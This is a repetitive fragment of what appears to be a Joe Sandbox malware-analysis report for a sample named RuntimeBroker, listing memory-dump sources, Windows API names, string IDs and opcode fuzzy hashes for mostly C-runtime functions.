                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                • String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
                                                                                                                                                                                • API String ID: 1878133881-640379615
                                                                                                                                                                                • Opcode ID: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
                                                                                                                                                                                • Instruction ID: af1387d9db9d7d3bf83509ff0e6c4c7990992e76bb330028233f50d2ce082711
                                                                                                                                                                                • Opcode Fuzzy Hash: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
                                                                                                                                                                                • Instruction Fuzzy Hash: 1521627261868581F631AB14F8917EAE364FF84788F805036E68C03AA9DF7CD645CF50
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                • Opcode ID: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                                                                                                                • Instruction ID: 8e3b3e306574e7f61bf58f8bf8c1e9b279429b4e0d4639f729e3fe6385c65779
                                                                                                                                                                                • Opcode Fuzzy Hash: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                                                                                                                • Instruction Fuzzy Hash: B0F04F21B1970282EA21AB28AC58379D360EF49761FD4063AC66E462F4CF2CE549DB24
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                • Instruction ID: cdbec39fe88b8b913bc251ff7848899eab10ab288a91432b798b2634b240b1d5
                                                                                                                                                                                • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                • Instruction Fuzzy Hash: 8A119D22E18B0615F676332EEC55375C140EF54374FA58634EA6F066FADE6CB880A938
                                                                                                                                                                                APIs
                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,00007FF72B0698B3,?,?,00000000,00007FF72B069B4E,?,?,?,?,?,00007FF72B069ADA), ref: 00007FF72B06A6BF
                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF72B0698B3,?,?,00000000,00007FF72B069B4E,?,?,?,?,?,00007FF72B069ADA), ref: 00007FF72B06A6DE
                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF72B0698B3,?,?,00000000,00007FF72B069B4E,?,?,?,?,?,00007FF72B069ADA), ref: 00007FF72B06A706
                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF72B0698B3,?,?,00000000,00007FF72B069B4E,?,?,?,?,?,00007FF72B069ADA), ref: 00007FF72B06A717
                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF72B0698B3,?,?,00000000,00007FF72B069B4E,?,?,?,?,?,00007FF72B069ADA), ref: 00007FF72B06A728
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                • Opcode ID: 67d7c9a4660121c24c4849512b9cbc25590cd10ead7cd9dc77a6027d31c3e6e3
                                                                                                                                                                                • Instruction ID: 1364caece26dab5515411e034ba650f93c67f1b4400aaee923452db8bc1a894e
                                                                                                                                                                                • Opcode Fuzzy Hash: 67d7c9a4660121c24c4849512b9cbc25590cd10ead7cd9dc77a6027d31c3e6e3
                                                                                                                                                                                • Instruction Fuzzy Hash: AE112E60B0824241FA7A732E5D45579A191DF5C3A0E848338E83D066F6DE2CF9414E21
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                • Opcode ID: 581e4780875054967335282bc59389d1b6b850a269c2162d209fd03ec5aafdf4
                                                                                                                                                                                • Instruction ID: e1e106ad7c24c868b650aa32ceaa768513105a404262aad3cbfed5e7d7309070
                                                                                                                                                                                • Opcode Fuzzy Hash: 581e4780875054967335282bc59389d1b6b850a269c2162d209fd03ec5aafdf4
                                                                                                                                                                                • Instruction Fuzzy Hash: C811AF60F0820742FABBB32E5C55179A282DF4D360E98463CD93E0A6F2ED2CB4814E25
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                • String ID: verbose
                                                                                                                                                                                • API String ID: 3215553584-579935070
                                                                                                                                                                                • Opcode ID: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                                                                                                                • Instruction ID: b2c19d59ef05b815ccca853d3ac178b81d870d9a207edadf02daf4337dd2a9e1
                                                                                                                                                                                • Opcode Fuzzy Hash: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                                                                                                                • Instruction Fuzzy Hash: B191B232B08A4A41E772AF29D85137DB691FB48B58FC8413ADB5D463E6DF3CE4458B20
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                • API String ID: 3215553584-1196891531
                                                                                                                                                                                • Opcode ID: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                                                                                                • Instruction ID: 4f010d35ff208d2c723585413aa800c4e70c2e295ecb55bdf8dce9ed40208194
                                                                                                                                                                                • Opcode Fuzzy Hash: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                                                                                                • Instruction Fuzzy Hash: EB81A472F0820385F7766F2DC910279A6A0EB19B44FD5803DDA09972F6DF2DE9419F21
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                • API String ID: 2395640692-1018135373
                                                                                                                                                                                • Opcode ID: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                                                                                                • Instruction ID: 32d30eb9b581d902e34a83233bec81a9ddfc7516a7bd881ef265421ed143e5cd
                                                                                                                                                                                • Opcode Fuzzy Hash: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                                                                                                • Instruction Fuzzy Hash: 7F51B632B196428AEB35EF1DE884A79B791FB44B88F904131DA8D43B55EF7DE841CB10
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                                                                                • Opcode ID: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
                                                                                                                                                                                • Instruction ID: e8aa95862f049df6bdb488c92c46f8a077187875982a9bd6e7b22285e5271803
                                                                                                                                                                                • Opcode Fuzzy Hash: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
                                                                                                                                                                                • Instruction Fuzzy Hash: 3A617232908B8585D732AB19E8807AAB7A4FB85794F444225EBDD03BA5DF7CE190CF10
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                • Opcode ID: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                                                                                                • Instruction ID: e8dd506dfc603b8a3917fa28343397097fc7c12650f289d89f0e31019f2befc8
                                                                                                                                                                                • Opcode Fuzzy Hash: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                                                                                                • Instruction Fuzzy Hash: 67519F36A082468AEB75AF19D8C4268B698FB54BC4F948136DA9D43FE1CF3CE450CF11
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateDirectoryW.KERNEL32(00000000,?,00007FF72B05324C,?,?,00007FF72B053964), ref: 00007FF72B057642
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateDirectory
                                                                                                                                                                                • String ID: %.*s$%s%c$\
                                                                                                                                                                                • API String ID: 4241100979-1685191245
                                                                                                                                                                                • Opcode ID: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
                                                                                                                                                                                • Instruction ID: 670eb64b3ad20e227d6b924cd6b13f2152e80743bbe40f4b4cf199082df6a548
                                                                                                                                                                                • Opcode Fuzzy Hash: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
                                                                                                                                                                                • Instruction Fuzzy Hash: E931EA71619AC545FA32AB18EC507EAA254FB44BE0FC04231EE6D43FE5DF2CE6418B10
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                • String ID: Error$Error/warning (ANSI fallback)
                                                                                                                                                                                • API String ID: 1878133881-653037927
                                                                                                                                                                                • Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                                                                                                                • Instruction ID: 0abdf55444c5001ce555d8f4659d7062b50a89355b13298ebedb6696a2452218
                                                                                                                                                                                • Opcode Fuzzy Hash: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                                                                                                                • Instruction Fuzzy Hash: D9118E62628B8581FA31AB04E865BA9A364FB48784FD05135DA8C17664DF3CD605CB10
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2718003287-0
                                                                                                                                                                                • Opcode ID: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
                                                                                                                                                                                • Instruction ID: 3dae9bfc67ff5a5ed588d57b68934f092cf885b1609d595cee30ffe311b52fe2
                                                                                                                                                                                • Opcode Fuzzy Hash: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
                                                                                                                                                                                • Instruction Fuzzy Hash: EED11872B08A8189E722DF6DD8402BC7775FB487D8B944139CE5D97BA9DE38D106C710
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _get_daylight$_isindst
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4170891091-0
                                                                                                                                                                                • Opcode ID: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
                                                                                                                                                                                • Instruction ID: f8abb6c60e4667fb5b28f40328a6fbffd540294d78cab25feee8e4e29192c84b
                                                                                                                                                                                • Opcode Fuzzy Hash: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
                                                                                                                                                                                • Instruction Fuzzy Hash: 0F510672F046118AEB35EF6C9D412BCA7A5EB18358F900139DE1E52AF5DF38E402CB10
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2780335769-0
                                                                                                                                                                                • Opcode ID: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
                                                                                                                                                                                • Instruction ID: 9d71321bd6c65d40d719e8f776891b42fe228ada2eefde16b2cb41f1114510d6
                                                                                                                                                                                • Opcode Fuzzy Hash: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
                                                                                                                                                                                • Instruction Fuzzy Hash: 46518F22F0464189FB61EF79D8503BDA3A1FF48B98F589539DE09477A8DF38D4818B60
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1956198572-0
                                                                                                                                                                                • Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                                                                                                                • Instruction ID: c8638e91913230c79782100caf983f588930d4d4a28d6d5b07f2496bcbdb15e2
                                                                                                                                                                                • Opcode Fuzzy Hash: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                                                                                                                • Instruction Fuzzy Hash: 8D118A21E0815242F666AB5DED842799251FF88780FD49031DA4906FAACD2DD4D19B20
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
